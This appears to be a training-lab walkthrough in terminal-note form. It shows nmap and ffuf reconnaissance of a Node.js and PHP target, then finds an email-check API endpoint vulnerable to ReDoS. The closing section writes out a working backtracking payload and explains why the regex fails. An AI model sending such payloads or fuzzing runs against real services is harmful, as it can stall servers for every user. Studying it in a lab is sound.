DISCOVERY
root@oco:~$ sudo nmap -sC -sV -T4 10.129.202.133 -p-
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3001/tcp open http PHP cli server 5.5 or later
|_http-title: Login
3002/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3003/tcp open http PHP cli server 5.5 or later (PHP 7.4.3)
root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003
PORT STATE SERVICE
3000/tcp open ppp
3001/tcp open nessus
3002/tcp open exlm-agent
3003/tcp open cgms
* the service names in this second scan (ppp, nessus, exlm-agent, cgms) are only
  nmap-services port-table guesses, because this run has no -sV; trust the
  version detection from the first scan (Node.js Express on 3000/3002, PHP CLI
  server on 3001/3003), not these labels
root@oco:~$ find / -iname directory-list*
/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic
api [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms]
API [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms]
* 'api' and 'API' return the same 15-byte body, so routing appears to be
  case-insensitive; treat them as one endpoint rather than two hits
* -w specifies the wordlist
* -u specifies the url
* -t increases the number of threads
* -ic ignores commented lines in the wordlist (default: false), so '#' entries
  are not sent as requests
root@oco:~$ curl http://10.129.202.133:3000/api
{"status":"UP"}
* try this on Kibana
#perform API endpoint fuzzing against /api/ with the common-api-endpoints-mazen160.txt list
root@oco:~$ find / -iname common-api* 2>/dev/null
/usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt .
root@oco:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic
check-email [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]
#identify the query parameter name by fuzzing it with ffuf (e.g. a parameter-name
#wordlist on /api/check-email?FUZZ=test, filtering out the default response size);
#the exact command was not captured here
root@oco:~$ ...
#test response time: first take a baseline with a short value, and measure it
#(e.g. `time curl ...` or `curl -w '%{time_total}\n'`) rather than judging by feel
root@oco:~$ curl "http://<TARGET IP>:3000/api/check-email?email=test_value"
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}
#craft the payload: long runs of characters for each group of the regex plus a
#trailing '.', so the input almost matches and then fails at the final '$',
#forcing the engine to backtrack through every way of splitting the runs
root@oco:~$ echo -n "jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555."
#observe time difference
root@oco:~$ curl "http://10.129.202.133:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555."
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}
* notice that the API takes several seconds to respond and that each extra
  character in the payload increases the evaluation time sharply: the pattern
  has nested quantifiers, (([a-zA-Z0-9-])+.)+ and ([a-zA-Z0-9]{2,4})+, around
  an unescaped '.', so a near-match that fails at the trailing '$' triggers
  catastrophic backtracking
- The difference in response time between the first cURL command and the
  second is significant, which confirms the endpoint is vulnerable to ReDoS
  (regular expression denial of service); on a Node.js server the match runs
  synchronously on the event loop, so a single such request stalls every other
  client while it evaluates. Confirm the growth with a few increasing payload
  lengths, timing each request, instead of repeatedly sending the largest one —
  against a real target that is already the attack, not the test